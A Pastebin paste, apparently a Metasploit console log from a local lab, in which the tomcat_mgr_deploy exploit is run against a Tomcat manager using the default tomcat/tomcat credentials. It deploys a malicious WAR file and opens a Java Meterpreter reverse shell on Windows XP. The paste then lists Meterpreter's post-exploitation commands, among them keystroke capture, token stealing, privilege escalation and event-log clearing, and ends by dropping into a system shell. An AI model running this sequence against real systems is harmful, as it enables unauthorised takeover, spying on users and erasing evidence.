Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(tomcat_mgr_deploy) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- PASSWORD tomcat no The password for the specified username
- PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
- Proxies no Use a proxy chain
- RHOST localhost yes The target address
- RPORT 8080 yes The target port
- USERNAME tomcat no The username to authenticate as
- VERBOSE false no Enable verbose output
- VHOST no HTTP server virtual host
- Payload options (java/shell/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST 127.0.0.1 yes The listen address
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 1 Java Universal
- msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
- payload => java/meterpreter/reverse_tcp
- msf exploit(tomcat_mgr_deploy) > exploit
- [*] Started reverse handler on 127.0.0.1:4444
- [*] Using manually select target "Java Universal"
- [*] SHELL set to cmd.exe
- [*] Uploading 6309 bytes as 6uD9BUvXfIr8OfmpwRvokVMxtdpHH.war ...
- [*] Executing /6uD9BUvXfIr8OfmpwRvokVMxtdpHH/tO3s8i.jsp...
- [*] Undeploying 6uD9BUvXfIr8OfmpwRvokVMxtdpHH ...
- [*] Sending stage (26938 bytes) to 127.0.0.1
- [*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:11545) at 2010-10-22 23:09:00 +0100
- meterpreter >
- meterpreter > help
- Core Commands
- =============
- Command Description
- ------- -----------
- ? Help menu
- background Backgrounds the current session
- bgkill Kills a background meterpreter script
- bglist Lists running background scripts
- bgrun Executes a meterpreter script as a background thread
- channel Displays information about active channels
- close Closes a channel
- exit Terminate the meterpreter session
- help Help menu
- interact Interacts with a channel
- irb Drop into irb scripting mode
- migrate Migrate the server to another process
- quit Terminate the meterpreter session
- read Reads data from a channel
- run Executes a meterpreter script
- use Load a one or more meterpreter extensions
- write Writes data to a channel
- Stdapi: File system Commands
- ============================
- Command Description
- ------- -----------
- cat Read the contents of a file to the screen
- cd Change directory
- del Delete the specified file
- download Download a file or directory
- edit Edit a file
- getlwd Print local working directory
- getwd Print working directory
- lcd Change local working directory
- lpwd Print local working directory
- ls List files
- mkdir Make directory
- pwd Print working directory
- rm Delete the specified file
- rmdir Remove directory
- search Search for files
- upload Upload a file or directory
- Stdapi: Networking Commands
- ===========================
- Command Description
- ------- -----------
- ipconfig Display interfaces
- portfwd Forward a local port to a remote service
- route View and modify the routing table
- Stdapi: System Commands
- =======================
- Command Description
- ------- -----------
- clearev Clear the event log
- drop_token Relinquishes any active impersonation token.
- execute Execute a command
- getpid Get the current process identifier
- getprivs Get as many privileges as possible
- getuid Get the user that the server is running as
- kill Terminate a process
- ps List running processes
- reboot Reboots the remote computer
- reg Modify and interact with the remote registry
- rev2self Calls RevertToSelf() on the remote machine
- shell Drop into a system command shell
- shutdown Shuts down the remote computer
- steal_token Attempts to steal an impersonation token from the target process
- sysinfo Gets information about the remote system, such as OS
- Stdapi: User interface Commands
- ===============================
- Command Description
- ------- -----------
- enumdesktops List all accessible desktops and window stations
- getdesktop Get the current meterpreter desktop
- idletime Returns the number of seconds the remote user has been idle
- keyscan_dump Dump the keystroke buffer
- keyscan_start Start capturing keystrokes
- keyscan_stop Stop capturing keystrokes
- screenshot Grab a screenshot of the interactive desktop
- setdesktop Change the meterpreters current desktop
- uictl Control some of the user interface components
- meterpreter > cat ...
- Unknown request detected:
- TLV_TYPE_METHOD = stdapi_railgun_api
- TLV_TYPE_REQUEST_ID = 56807978639825980098238633155564
- 0x24E21 = 0
- 0x44E22 = (raw data, 0 bytes)
- 0x44E23 = (raw data, 0 bytes)
- 0x44E24 = (raw data, 0 bytes)
- 0x14E29 = shell32
- 0x14E2A = IsUserAnAdmin
- meterpreter > shell
- Process 1 created.
- Channel 2 created.
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- D:\Progs-Michi\apache-tomcat-6.0.26\bin>exit
- meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement